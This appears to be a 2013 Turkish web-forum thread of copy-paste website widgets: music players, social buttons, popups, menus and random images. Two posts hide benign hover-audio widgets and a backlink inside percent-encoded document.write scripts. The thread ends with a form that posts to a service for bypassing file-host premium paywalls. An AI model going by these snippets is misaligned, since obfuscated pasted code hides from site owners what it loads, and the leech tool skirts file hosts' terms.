Yazar |
Mesaj |
-
yusufck18
Uzman Üye
Konum: Kütahya
|
29.07.2013, 07:26 (UTC) Mesaj konusu: |
|
|
|
|
↑
|
|
|
-
kaankart
Bedava-Sitem Bağımlısı
|
29.07.2013, 11:15 (UTC) Mesaj konusu: Müzik Player Ekleme |
|
|
Kod kısmının kısa olduğu kadar çalışma mantığı da gayet basit.
<embed açılıp src kısmına müzik adresi yazılır.
autostart=true ile otomatik başlasın demiş olduk.
loop=true ilede tekrar çalabilme olsun demiş oluyoruz.
</embed> i kapatıp <noembed açılır.
<bgsound açılır src kısmına tekrar müzik adresi yazılır.
loop=infinite ile sonsuz çal komutu verilir.
</noembed> kapatılır.
Önizleme:
muzikadi.mp3 yazan yere mp3 linki oluşturacak. Diyeceksiniz ki ben bilgisayarımdaki müziği URL olarak nasıl yapabilirim? Cevap:Mp3 uzantısında yapabileceğim yeri forum dışında adres veremeyeceğimden arama motorundan arama yapıp taratın bir çok ücretsiz servisler çıkacaktır. Kolay gelsin. İyi forumlar!
Kod: <html>
<head>
<title>Müzik Player</title>
</head>
<body>
<embed src="muzikadi.mp3" autostart="true" loop="true"></embed>
<noembed>
<bgsound src="muzikadi.mp3" loop="infinite">
</noembed>
</body>
</html> ______________ => Şimdi aşağıdaki [ Link ] tıkladığınızda [ Sıkça Sorulan Sorular ] adlı alt forumumuza yöneleceksiniz ve umarım sorunlarınıza cevap bulabilirsiniz.
=> http://www.bedava-sitem.com/forum/viewforum.php?f=37
|
|
↑
|
|
|
-
kaankart
Bedava-Sitem Bağımlısı
|
30.07.2013, 13:03 (UTC) Mesaj konusu: Sosyal Ağ Butonu Hareketli |
|
|
Önizleme:
Kod: <style>
.touchme a {
display:block;
height:50px;
width:50px;
padding:0 4px;
float:left;
background:transparent url(http://o1307.hizliresim.com/1c/y/qyfu9.png) no-repeat;
-webkit-transition: ease-in 0.2s all;
-moz-transition: ease-in 0.2s all;
-o-transition: ease-in 0.2s all;
-ms-transition: ease-in 0.2s all;
transition: ease-in 0.2s all;
cursor:pointer;
}
.touchme a.googleplus {
background-position: 0px -58px;
}
.touchme a.googleplus:hover {
background-position: 0px 0px;
}
.touchme a.twitter {
background-position: 0px -290px;
}
.touchme a.twitter:hover {
background-position: 0px -232px;
}
.touchme a.facebook {
background-position: 0px -406px;
}
.touchme a.facebook:hover {
background-position: 0px -348px;
}
.touchme a.rss {
background-position: 0px -174px;
}
.touchme a.rss:hover {
background-position: 0px -116px;
}
</style>
<div class='touchme'>
<!--Facebook-->
<a class='facebook' href="http://www.facebook.com/pages/#" rel='external nofollow' target='_blank'></a>
<!-- Twitter -->
<a class='twitter' href="https://twitter.com/#" rel='external nofollow' target='_blank' ></a>
<!--Google Plus-->
<a class='googleplus' href="https://plus.google.com/#" rel='external nofollow' target='_blank'></a>
<!--RSS-->
<a class='rss' href="http://feeds.feedburner.com/#" rel='external nofollow' target='_blank'></a>
</div> ______________ => Şimdi aşağıdaki [ Link ] tıkladığınızda [ Sıkça Sorulan Sorular ] adlı alt forumumuza yöneleceksiniz ve umarım sorunlarınıza cevap bulabilirsiniz.
=> http://www.bedava-sitem.com/forum/viewforum.php?f=37
|
|
↑
|
|
|
-
kaankart
Bedava-Sitem Bağımlısı
|
30.07.2013, 13:12 (UTC) Mesaj konusu: Bloglarda Kullanılan "468x60 Reklam Alanı" |
|
|
Önizleme:
Kod: <div style="float:left;margin:10px 0px 20px 0px;width:574px;height:84px;background-color:#eee; margin-left:3px;border:2px solid #999;">
<img src="http://o1307.hizliresim.com/1c/y/qyg44.png" style="margin-left:10px;margin-top:10px;float:left;border:1px solid #999;" />
<a href="Buraya Sitenizin linki eklenecek"><img src="http://o1307.hizliresim.com/1c/y/qyg5c.jpg" style="margin-right:10px;margin-top:10px;float:right;border:1px solid #999;" /></a></div> ______________ => Şimdi aşağıdaki [ Link ] tıkladığınızda [ Sıkça Sorulan Sorular ] adlı alt forumumuza yöneleceksiniz ve umarım sorunlarınıza cevap bulabilirsiniz.
=> http://www.bedava-sitem.com/forum/viewforum.php?f=37
|
|
↑
|
|
|
-
kaankart
Bedava-Sitem Bağımlısı
|
12.08.2013, 19:25 (UTC) Mesaj konusu: İstediğiniz resimleri rastgele göstermek istiyorsanız |
|
|
Kod: <script type="text/javascript">
<!--
var imlocation = "resimler/";
var currentdate = 0;
var image_number = 0;
function ImageArray (n) {
this.length = n;
for (var i =1; i <= n; i++) {
this[i> = ' '
}
}
image = new ImageArray(3)
image[0> = 'image1.gif'
image[1> = 'image2.gif'
image[2> = 'image3.gif'
var rand = 60/image.length
function randomimage() {
currentdate = new Date()
image_number = currentdate.getSeconds()
image_number = Math.floor(image_number/rand)
return(image[image_number>)
}
document.write("<img src='" + imlocation + randomimage()+ "'>");
//-->
</script> ______________ => Şimdi aşağıdaki [ Link ] tıkladığınızda [ Sıkça Sorulan Sorular ] adlı alt forumumuza yöneleceksiniz ve umarım sorunlarınıza cevap bulabilirsiniz.
=> http://www.bedava-sitem.com/forum/viewforum.php?f=37
|
|
↑
|
|
|
-
kaankart
Bedava-Sitem Bağımlısı
|
12.08.2013, 19:26 (UTC) Mesaj konusu: resmin üstüne yazı ekleyin |
|
|
Resmin üstüne yazı ekleyin
Kod: public function resimyazi($resimadi,$yazi){
header('Content-Type: image/jpeg');
$kaynak = IMageCreatefromJPEG($resimadi);
$genislik = ImageSx($kaynak);
$yukseklik = ImageSy($kaynak);
$x=$genislik/1; $y=$yukseklik/1;
$dst = ImageCreateTrueColor($x,$y);
ImageCopyReSampled($dst,$kaynak,0,0,0,0,$x,$y,$genislik,$yukseklik);
$yazirengi2 = ImageColorAllocate($dst, 0, 0, 0);
ImageString($dst, 3, 5, 5, "$yazi", $yazirengi);
ImageJPEG($dst);
} ______________ => Şimdi aşağıdaki [ Link ] tıkladığınızda [ Sıkça Sorulan Sorular ] adlı alt forumumuza yöneleceksiniz ve umarım sorunlarınıza cevap bulabilirsiniz.
=> http://www.bedava-sitem.com/forum/viewforum.php?f=37
|
|
↑
|
|
|
-
kaankart
Bedava-Sitem Bağımlısı
|
12.08.2013, 19:40 (UTC) Mesaj konusu: 5 Sn'lik POPUP |
|
|
5 Sn'lik POPUP
Kod: <HTML>
<HEAD>
<SCRIPT LANGUAGE="JavaScript">
<!-- Begin
function popupWin() {
text = "<html>n<head>n<title>siten</title>n<body>n";
text += "<center>n<br>";
text += "<a href='sitenurl' target='_blank'><h2>Siteme hoşgeldiniz. </h2></a>";
text += "</center>n</body>n</html>n";
setTimeout('windowProp(text)', 3000); // delay 3 seconds before opening
}
function windowProp(text) {
newWindow = window.open('','newWin','width=300,height=100');
newWindow.document.write(text);
setTimeout('closeWin(newWindow)', 5000); // delay 5 seconds before closing
}
function closeWin(newWindow) {
newWindow.close(); // close small window and depart
}
// End -->
</script>
</HEAD>
<BODY onLoad_fckprotectedatt=" onLoad="popupWin()"">
<center>
</center>
</BODY>
</HTML> ______________ => Şimdi aşağıdaki [ Link ] tıkladığınızda [ Sıkça Sorulan Sorular ] adlı alt forumumuza yöneleceksiniz ve umarım sorunlarınıza cevap bulabilirsiniz.
=> http://www.bedava-sitem.com/forum/viewforum.php?f=37
|
|
↑
|
|
|
-
nezihworld
Aktif Üye
Konum: Eskisehir
|
19.08.2013, 07:42 (UTC) Mesaj konusu: Nezih World | World Entertainment Network |
|
|
Bu kod benim sitemde bulunan dikey menüdür. Siz bu kodu kendi sitenize çevirin. Önezilendirmesi sitemde var.
Kod: <span style="font-family: Times New Roman"><span style="background-color: #ffffff"><span style="color: #000000"><span style="font-size: xx-large"> <a href="https://www.google.com.tr/search?sourceid=navclient&aq=&oq=nezih+world&hl=tr&ie=UTF-8&rlz=1T4ADSA_trTR467TR467&q=nezih+world&gs_l=hp....0.0.0.29154...........0.AcjSpQifj6A#bav=on.2,or.&ei=N-kMUsfXEYrlswaz3YDACg&fp=4bcd0963f3ec39e&hl=tr&q=site:tr.gg+nezih+world&sa=N&start=0">G</a> </span></span></span></span><span style="background-color: #ffffff"><span style="color: #000000"><span style="font-size: xx-large"> </span></span></span><span style="font-size: xx-large"><span style="background-color: #3366ff"><span style="color: #ffffff"><a href="https://www.facebook.com/#!/nezihworld?fref=ts"><span style="font-family: Tahoma"><span style="background-color: #3366ff"><span style="color: #ffffff"> F </span></span></span></a></span></span><span style="color: #000000"><span style="background-color: #ffffff"><span style="color: #3366ff"><span style="background-color: #ffffff"><span style="font-family: Times New Roman"> </span></span></span></span></span></span><span style="color: #000000"><span style="background-color: #ffffff"><span style="color: #3366ff"><span style="background-color: #ffffff"><span style="font-family: Times New Roman"><span style="font-size: x-large"><span style="font-size: xx-large"> <span style="font-size: large"><br />
<table border="1" cellspacing="1" cellpadding="1" width="184" style="width: 184px; height: 29px">
<caption>
<div style="text-align: left"><span style="font-size: large"><br />
</span></div>
<span style="font-size: large">Sık Kullanılanlara Ekle</span></caption>
<tbody>
<tr>
<td><span style="font-size: medium">CTRL + D</span></td>
</tr>
</tbody>
</table>
<br />
<table border="1" cellspacing="1" cellpadding="1" width="183" style="width: 183px; height: 211px">
<caption><span style="font-size: large">Kategoriler</span></caption>
<tbody>
<tr>
<td><span style="font-size: medium"><a href="http://nezihworld-forum.tr.gg/">Forum</a></span></td>
</tr>
<tr>
<td><span style="font-size: medium"><a href="http://nezihworld.tr.gg/Oyunlar.htm">Oyunlar</a></span></td>
</tr>
<tr>
<td><span style="font-size: medium"><a href="http://nezihworld.tr.gg/F%26%23305%3Bkralar.htm">Fıkralar</a></span></td>
</tr>
<tr>
<td><span style="font-size: medium"><a href="http://nezihworld.tr.gg/Top-Liste.htm">Top Liste</a></span></td>
</tr>
<tr>
<td><span style="font-size: medium"><a href="http://nezihworld.tr.gg/Santra%E7.htm">Santraç</a></span></td>
</tr>
<tr>
<td><span style="font-size: medium"><a href="http://nezihworld.tr.gg/Anketler.htm">Anketler</a></span></td>
</tr>
<tr>
<td><span style="font-size: medium"><a href="http://nezihworld.tr.gg/Galeri/index.htm">Galeri</a></span></td>
</tr>
<tr>
<td><span style="font-size: medium"><a href="http://nezihworld.tr.gg/-Oe-neriler.htm">Öneriler</a></span></td>
</tr>
</tbody>
</table>
<br />
<table border="1" cellspacing="1" cellpadding="1" width="183" style="width: 183px; height: 50px">
<caption><span style="font-size: large">Yeni misin?</span></caption>
<tbody>
<tr>
<td><span style="font-size: medium"><a href="http://nezihworld.tr.gg/Tura-%C7%26%23305%3Bk.htm">Tura Çık</a><br />
<a href="http://www.sitearaclari.com/servis_panel.php?wid=2c4e966&l=tr_TR&pid=9fbdae0c9adb8b3b9255638ab462739d">Üye Ol</a></span></td>
</tr>
</tbody>
</table>
<br />
<table border="1" cellspacing="1" cellpadding="1" width="182" style="width: 182px; height: 29px">
<caption><span style="font-size: large">Admin</span></caption>
<tbody>
<tr>
<td><span style="font-family: Arial"><span style="font-size: medium">Kullanıcı Adı: Nezih</span></span></td>
</tr>
</tbody>
</table>
<br />
<table border="1" cellspacing="1" cellpadding="1" width="181" style="width: 181px; height: 165px">
<caption><span style="font-size: large">İstatistikler</span></caption>
<tbody>
<tr>
<td><span style="font-size: medium"><span style="color: #000000">En fazla klik: 16 Ağustos 2013 (287)</span></span></td>
</tr>
<tr>
<td><span style="font-size: medium">En fazla ziyaretçi: 16 Ağustos 2013 (77)</span></td>
</tr>
<tr>
<td><span style="font-size: medium">En fazla kişi başına düşen klik: 10 Ağustos 2013 (15.80)</span></td>
</tr>
</tbody>
</table>
<br />
<table border="1" cellspacing="1" cellpadding="1" width="182" style="width: 182px; height: 134px">
<caption><span style="font-size: large">Etiketler</span></caption>
<tbody>
<tr>
<td><span style="color: #666666"><span style="font-size: small">eğlence günlük ziyaretçi defteri iletişim arşiv forum oyun fıkra galeri nezih arhan tözenbilek top liste santraç üyelik html kodları nezihworld world entertainment network sosyal ağ</span></span></td>
</tr>
</tbody>
</table>
<br />
<table border="1" cellspacing="1" cellpadding="1" width="182" style="width: 182px; height: 154px">
<caption><span style="font-size: large"><span style="font-family: Times New Roman">Dost Siteler</span></span></caption>
<tbody>
<tr>
<td><span style="font-size: medium"><span style="font-family: Arial"><span style="font-family: Arial">Eklenecek</span></span></span></td>
</tr>
<tr>
<td><span style="font-size: medium"><span style="font-family: Arial">Eklenecek</span></span></td>
</tr>
<tr>
<td><span style="font-size: medium"><span style="font-family: Arial">Eklenecek</span></span></td>
</tr>
<tr>
<td><span style="font-size: medium"><span style="font-family: Arial">Eklenecek</span></span></td>
</tr>
<tr>
<td><span style="font-size: medium"><span style="font-family: Arial">Eklenecek</span></span></td>
</tr>
</tbody>
</table>
<br />
</span></span></span></span></span></span></span></span><!-- SiteAraclari.com --><script type="text/javascript" src="http://www.sitearaclari.com/servis_sayac.php?id=2c4e966&l=tr_TR&sablontip=flash&sablon=bulutlar&width=120&height=45&arkarenk=FFFFFF&arka2renk=C6F7FF&servis_yazirenk=000000"></script><!-- SiteAraclari.com --> |
|
↑
|
|
|
-
tastekineglence
Uzman Üye
|
26.08.2013, 13:25 (UTC) Mesaj konusu: Kod |
|
|
Sitenin sol üst küşesinde basit "Rabia İşareti " kodu.Sitenize kolayca ekleyebilirsiniz.Kod tarafımca yapılmıştır.Güle güle kullanın. (:
Onizleme:
Kod: <!--Rabia İsareti Kodu By Tastekin START --!><img border="0" style="left: 0px; position: absolute; top: 0px;" alt="rabia isareti by tastekin" src="http://img.webme.com/pic/t/tastekineglence/rabiaistastekin.png" _fcksavedurl="http://img.webme.com/pic/t/tastekineglence/rabiaistastekin.png" /></a><!-- Rabia İsareti Kodu By Tastekin Finish --!> |
|
↑
|
|
|
-
profesorisbasinda
Acemi Üye
|
01.09.2013, 16:23 (UTC) Mesaj konusu: Üzerine Gelince İstiklal Marşı Okusun Kodu |
|
|
Üzerine gelince istiklal marşı okuyan kod
Kod: <!--profesorisbasinda.tr.gg istiklal marsi kodu-->
<script type="text/javascript">
document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%20%77%6D%61%72%61%63%69%20%68%74%6D%6C%20%5F%69%66%72%65%6C%65%79%69%63%69%20%68%74%74%70%3A%2F%2F%77%6D%61%72%61%63%69%2E%63%6F%6D%20%2D%2D%3E%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%27%25%33%43%25%37%33%25%37%34%25%37%39%25%36%43%25%36%35%25%32%30%25%37%34%25%37%39%25%37%30%25%36%35%25%33%44%25%32%32%25%37%34%25%36%35%25%37%38%25%37%34%25%32%46%25%36%33%25%37%33%25%37%33%25%32%32%25%33%45%25%36%34%25%36%39%25%37%36%25%32%45%25%36%36%25%36%39%25%37%38%25%37%35%25%36%35%25%36%34%25%32%44%25%37%30%25%36%46%25%37%33%25%36%39%25%37%34%25%36%39%25%36%46%25%36%45%25%37%42%25%37%30%25%36%46%25%37%33%25%36%39%25%37%34%25%36%39%25%36%46%25%36%45%25%33%41%25%36%36%25%36%39%25%37%38%25%36%35%25%36%34%25%33%42%25%37%34%25%36%35%25%37%38%25%37%34%25%32%44%25%36%31%25%36%43%25%36%39%25%36%37%25%36%45%25%33%41%25%36%33%25%36%35%25%36%45%25%37%34%25%36%35%25%37%32%25%33%42%25%37%41%25%32%44%25%36%39%25%36%45%25%36%34%25%36%35%25%37%38%25%33%41%25%33%32%25%33%30%25%33%30%25%33%30%25%33%42%25%37%44%25%36%34%25%36%39%25%37%36%25%32%45%25%36%36%25%36%39%25%37%38%25%37%35%25%36%35%25%36%34%25%32%44%25%37%33%25%32%44%25%36%35%25%37%42%25%37%34%25%36%46%25%37%30%25%33%41%25%33%33%25%33%35%25%37%30%25%37%38%25%33%42%25%36%43%25%36%35%25%36%36%25%37%34%25%33%41%25%33%30%25%37%30%25%37%38%25%33%42%25%37%32%25%36%39%25%36%37%25%36%38%25%37%34%25%33%41%25%33%32%25%33%39%25%33%30%25%33%30%25%33%30%25%37%30%25%37%38%25%33%42%25%37%44%25%33%43%25%32%46%25%37%33%25%37%34%25%37%39%25%36%43%25%36%35%25%33%45%25%33%43%25%37%33%25%37%34%25%37%39%25%36%43%25%36%35%25%32%30%25%37%34%25%37%39%25%37%30%25%36%35%25%33%44%25%32%32%25%37%34%25%36%35%25%37%38%25%37%34%25%32%46%25%36%33%25%37%33%25%37%33%25%32%32%25%33%45%25%36%34%25%36%39%25%37%36%25%32%45%25%36%36%25%36%39%25%37%38%25%37%35%25%36%35%25%36%34%25%32%44%25%37%30%25%36%46%25%37%33%25%36%39%25%37%34%25%36%39%25%36%46%25%36%45%25%37%42%25%35%46%25%37%30%25%36%46%25%37%33%25%36%39%25%37%34%25%36%39%25%36%46%25%36%45%25%33%41%25%36%31%25%36%32%25%37%33%25%36%46%25%36%43%25%37%35%25%37%34%25%36%35%25%33%42%25%37%44%25%36%34%25%36%39%25%37%36%25%32%45%25%36%36%25%36%39%25%37%38%25%37%35%25%36%35%25%36%34%25%32%44%25%37%33%25%32%44%25%36%35%25%37%42%25%35%46%25%36%32%25%36%46%25%37%34%25%37%34%25%36%46%25%36%44%25%33%41%25%36%31%25%37%35%25%37%34%25%36%46%25%33%42%25%35%46%25%37%34%25%36%46%25%37%30%25%33%41%25%36%35%25%37%38%25%37%30%25%37%32%25%36%35%25%37%33%25%37%33%25%36%39%25%36%46%25%36%45%25%32%38%25%36%39%25%36%35%25%33%36%25%33%44%25%32%38%25%36%34%25%36%46%25%36%33%25%37%35%25%36%44%25%36%35%25%36%45%25%37%34%25%32%45%25%36%34%25%36%46%25%36%33%25%37%35%25%36%44%25%36%35%25%36%45%25%37%34%25%34%35%25%36%43%25%36%35%25%36%44%25%36%35%25%36%45%25%37%34%25%32%45%25%37%33%25%36%33%25%37%32%25%36%46%25%36%43%25%36%43%25%35%34%25%36%46%25%37%30%25%32%42%25%36%34%25%36%46%25%36%33%25%37%35%25%36%44%25%36%35%25%36%45%25%37%34%25%32%45%25%36%34%25%36%46%25%36%33%25%37%35%25%36%44%25%36%35%25%36%45%25%37%34%25%34%35%25%36%43%25%36%35%25%36%44%25%36%35%25%36%45%25%37%34%25%32%45%25%36%33%25%36%43%25%36%39%25%36%35%25%36%45%25%37%34%25%34%38%25%36%35%25%36%39%25%36%37%25%36%38%25%37%34%25%32%30%25%32%44%25%32%30%25%33%35%25%33%32%25%32%42%25%32%32%25%37%30%25%37%38%25%32%32%25%32%39%25%32%30%25%32%39%25%33%42%25%37%44%25%33%43%25%32%46%25%37%33%25%37%34%25%37%39%25%36%43%25%36%35%25%33%45%25%30%41%25%33%43%25%36%34%25%36%39%25%37%36%25%32%30%25%36%33%25%36%43%25%36%31%25%37%33%25%37%33%25%33%44%25%32%32%25%36%36%25%36%39%25%37%38%25%37%35%25%36%35%25%36%34%25%32%44%25%37%30%25%36%46%25%37%33%25%36%39%25%37%34%25%36%39%25%36%46%25%36%45%25%32%30%25%36%36%25%36%39%25%37%38%25%37%35%25%36%35%25%36%34%25%32%44%25%37%33%25%32%44%25%36%35%25%32%32%25%33%45%25%30%41%25%33%43%25%36%34%25%36%39%25%37%36%25%32%30%25%36%39%25%36%34%25%33%44%25%32%32%25%36%39%25%37%33%25%37%34%25%36%39%25%36%42%25%36%43%25%36%31%25%36%43%25%36%44%25%36%31%25%37%32%25%37%33%25%36%39%25%32%32%25%32%30%25%36%33%25%36%43%25%36%31%25%37%33%25%37%33%25%33%44%25%32%32%25%36%31%25%36%45%25%36%39%25%36%44%25%36%31%25%37%34%25%36%35%25%36%34%25%32%30%25%36%36%25%36%31%25%36%34%25%36%35%25%34%39%25%36%45%25%35%35%25%37%30%25%32%32%25%32%30%25%37%33%25%37%34%25%37%39%25%36%43%25%36%35%25%33%44%25%32%32%25%37%34%25%36%35%25%37%38%25%37%34%25%32%44%25%36%31%25%36%43%25%36%39%25%36%37%25%36%45%25%33%41%25%32%30%25%36%33%25%36%35%25%36%45%25%37%34%25%36%35%25%37%32%25%33%42%25%32%32%25%33%45%25%33%43%25%36%31%25%32%30%25%36%38%25%37%32%25%36%35%25%36%36%25%33%44%25%32%32%25%36%38%25%37%34%25%37%34%25%37%30%25%33%41%25%32%46%25%32%46%25%37%30%25%37%32%25%36%46%25%36%36%25%36%35%25%37%33%25%36%46%25%37%32%25%36%39%25%37%33%25%36%32%25%36%31%25%37%33%25%36%39%25%36%45%25%36%34%25%36%31%25%32%45%25%37%34%25%37%32%25%32%45%25%36%37%25%36%37%25%32%46%25%32%32%25%33%45%25%33%43%25%36%39%25%36%44%25%36%37%25%32%30%25%37%33%25%37%34%25%37%39%25%36%43%25%36%35%25%33%44%25%32%32%25%36%33%25%37%35%25%37%32%25%37%33%25%36%46%25%37%32%25%33%41%25%36%38%25%36%35%25%36%43%25%37%30%25%32%32%25%32%30%25%36%46%25%36%45%25%36%44%25%36%46%25%37%35%25%37%33%25%36%35%25%36%46%25%37%36%25%36%35%25%37%32%25%33%44%25%32%32%25%36%34%25%36%46%25%36%33%25%37%35%25%36%44%25%36%35%25%36%45%25%37%34%25%32%45%25%36%37%25%36%35%25%37%34%25%34%35%25%36%43%25%36%35%25%36%44%25%36%35%25%36%45%25%37%34%25%34%32%25%37%39%25%34%39%25%36%34%25%32%38%25%32%37%25%36%32%25%36%35%25%36%35%25%37%30%25%32%44%25%36%46%25%36%45%25%36%35%25%32%37%25%32%39%25%32%45%25%37%30%25%36%43%25%36%31%25%37%39%25%32%38%25%32%39%25%32%32%25%32%30%25%36%46%25%36%45%25%36%44%25%36%46%25%37%35%25%37%33%25%36%35%25%36%46%25%37%35%25%37%34%25%33%44%25%32%32%25%36%34%25%36%46%25%36%33%25%37%35%25%36%44%25%36%35%25%36%45%25%37%34%25%32%45%25%36%37%25%36%35%25%37%34%25%34%35%25%36%43%25%36%35%25%36%44%25%36%35%25%36%45%25%37%34%25%34%32%25%37%39%25%34%39%25%36%34%25%32%38%25%32%37%25%36%32%25%36%35%25%36%35%25%37%30%25%32%44%25%36%46%25%36%45%25%36%35%25%32%37%25%32%39%25%32%45%25%37%30%25%36%31%25%37%35%25%37%33%25%36%35%25%32%38%25%32%39%25%32%32%25%32%30%25%37%33%25%37%32%25%36%33%25%33%44%25%32%32%25%36%38%25%37%34%25%37%34%25%37%30%25%33%41%25%32%46%25%32%46%25%36%39%25%36%44%25%36%37%25%33%33%25%33%33%25%33%35%25%32%45%25%36%39%25%36%44%25%36%31%25%36%37%25%36%35%25%37%33%25%36%38%25%36%31%25%36%33%25%36%42%25%32%45%25%37%35%25%37%33%25%32%46%25%36%39%25%36%44%25%36%37%25%33%33%25%33%33%25%33%35%25%32%46%25%33%39%25%33%37%25%33%31%25%32%46%25%36%32%25%33%33%25%33%31%25%36%36%25%33%37%25%33%33%25%33%30%25%36%35%25%33%33%25%33%30%25%33%36%25%36%37%25%37%35%25%32%45%25%36%37%25%36%39%25%36%36%25%32%32%25%32%30%25%36%31%25%36%43%25%37%34%25%33%44%25%32%32%25%34%42%25%36%35%25%36%44%25%36%31%25%36%43%25%32%30%25%35%33%25%37%35%25%36%45%25%36%31%25%36%43%25%32%32%25%32%30%25%32%46%25%33%45%25%33%43%25%32%46%25%36%31%25%33%45%25%32%30%25%32%30%25%33%43%25%36%31%25%37%35%25%36%34%25%36%39%25%36%46%25%32%30%25%37%33%25%37%34%25%37%39%25%36%43%25%36%35%25%33%44%25%32%32%25%36%34%25%36%39%25%37%33%25%37%30%25%36%43%25%36%31%25%37%39%25%33%41%25%36%45%25%36%46%25%36%45%25%36%35%25%33%42%25%32%32%25%32%30%25%36%39%25%36%34%25%33%44%25%32%32%25%36%32%25%36%35%25%36%35%25%37%30%25%32%44%25%36%46%25%36%45%25%36%35%25%32%32%25%32%30%25%36%33%25%36%46%25%36%45%25%37%34%25%37%32%25%36%46%25%36%43%25%37%33%25%33%44%25%32%32%25%36%33%25%36%46%25%36%45%25%37%34%25%37%32%25%36%46%25%36%43%25%37%33%25%32%32%25%32%30%25%37%30%25%37%32%25%36%35%25%36%43%25%36%46%25%36%31%25%36%34%25%33%44%25%32%32%25%36%31%25%37%35%25%37%34%25%36%46%25%32%32%25%33%45%25%32%30%25%33%43%25%37%33%25%36%46%25%37%35%25%37%32%25%36%33%25%36%35%25%32%30%25%37%33%25%37%32%25%36%33%25%33%44%25%32%32%25%36%38%25%37%34%25%37%34%25%37%30%25%33%41%25%32%46%25%32%46%25%37%33%25%36%31%25%36%45%25%36%43%25%36%39%25%37%37%25%36%35%25%36%32%25%32%45%25%37%34%25%36%42%25%32%46%25%36%39%25%37%33%25%37%34%25%36%39%25%36%42%25%36%43%25%36%31%25%36%43%25%36%44%25%36%31%25%37%32%25%37%33%25%36%39%25%32%45%25%36%44%25%37%30%25%33%33%25%32%32%25%33%45%25%33%43%25%32%46%25%37%33%25%36%46%25%37%35%25%37%32%25%36%33%25%36%35%25%33%45%25%32%30%25%33%43%25%32%46%25%36%31%25%37%35%25%36%34%25%36%39%25%36%46%25%33%45%25%33%43%25%32%46%25%36%34%25%36%39%25%37%36%25%33%45%25%30%41%25%33%43%25%32%46%25%36%34%25%36%39%25%37%36%25%33%45%27%29%29%3B%0A%3C%2F%73%63%72%69%70%74%3E'));
</script>
<!--profesorisbasinda.tr.gg istiklal marsi kodu--> |
|
↑
|
|
|
-
profesorisbasinda
Acemi Üye
|
02.09.2013, 07:24 (UTC) Mesaj konusu: Komedi siteleri için Kemal Sunal |
|
|
Üzerine gelince
-Şimdi ben buraya neden çıktım niçin çıktım bunu izaha gerek yok
diye söylüyor
Önizlem:
Kod: <!--Profesorisbasinda.tr.gg kemal sunal kodu-->
<script type="text/javascript">
document.write(unescape('%3C%73%74%79%6C%65%20%74%79%70%65%3D%22%74%65%78%74%2F%63%73%73%22%3E%23%6B%65%6D%61%6C%73%75%6E%61%6E%7B%70%6F%73%69%74%69%6F%6E%3A%66%69%78%65%64%3B%20%72%69%67%68%74%3A%30%3B%20%62%6F%74%74%6F%6D%3A%2D%32%70%78%3B%20%7A%2D%69%6E%64%65%78%3A%39%39%39%39%39%39%39%3B%7D%3C%2F%73%74%79%6C%65%3E%0A%3C%64%69%76%20%69%64%3D%22%6B%65%6D%61%6C%73%75%6E%61%6E%22%20%63%6C%61%73%73%3D%22%61%6E%69%6D%61%74%65%64%20%66%61%64%65%49%6E%55%70%22%3E%3C%69%6D%67%20%73%74%79%6C%65%3D%22%63%75%72%73%6F%72%3A%68%65%6C%70%22%20%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%22%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%62%65%65%70%2D%6F%6E%65%27%29%2E%70%6C%61%79%28%29%22%20%6F%6E%6D%6F%75%73%65%6F%75%74%3D%22%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%62%65%65%70%2D%6F%6E%65%27%29%2E%70%61%75%73%65%28%29%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%61%6E%6C%69%77%65%62%2E%74%6B%2F%6B%65%6D%61%6C%73%75%6E%61%6C%2E%70%6E%67%22%20%61%6C%74%3D%22%4B%65%6D%61%6C%20%53%75%6E%61%6C%22%20%77%69%64%74%68%3D%22%31%33%30%22%20%68%65%69%67%68%74%3D%22%31%31%38%22%20%2F%3E%20%3C%61%75%64%69%6F%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%3B%22%20%69%64%3D%22%62%65%65%70%2D%6F%6E%65%22%20%63%6F%6E%74%72%6F%6C%73%3D%22%63%6F%6E%74%72%6F%6C%73%22%20%70%72%65%6C%6F%61%64%3D%22%61%75%74%6F%22%3E%20%09%3C%73%6F%75%72%63%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%61%6E%6C%69%77%65%62%2E%74%6B%2F%6B%65%6D%61%6C%73%75%6E%61%6C%2E%6D%70%33%22%3E%3C%2F%73%6F%75%72%63%65%3E%20%3C%2F%61%75%64%69%6F%3E%3C%2F%64%69%76%3E'));
</script>
<!--Profesorisbasinda.tr.gg kemal sunal kodu--> |
|
↑
|
|
|
-
kdreklam
Acemi Üye
|
04.09.2013, 08:59 (UTC) Mesaj konusu: Premium Link Oluşturucu |
|
|
Turbobit Uploaded ve Letitbit için Premium Link Oluşturucu
Kod:
<!--Koddostu Permium Link Oluşturucu START-->
<!--Bu çalışma Creative Commons Attribution-Gayriticari-NoDerivs 3.0 Unported Lisansı ile lisanslanmıştır.-->
<!--Telif sahibi:koddostu.com-->
<div id="koddostu-premium"><koddostu><a id="jam">Premium Link Oluşturucu</a><a href="http://www.koddostu.com/2013/08/premium-link-olusturucu.html" target="_blank" id="dam">?</a></koddostu><div id="fam"></div><div id="koddostufram" style="display:block;width:300px;position:relative;height:5px;overflow:hidden;"><iframe scrolling="no" frameborder="0" name="koddostui" style="position:absolute;top:-385px;left:-30px;width:500px;height:1000px;" src="about:blank" marginheight="0"marginwidth="0"></iframe></div>
<form class="gen-form" target="koddostui" action="http://premiumleech.eu/generate-premium-link" method="post">
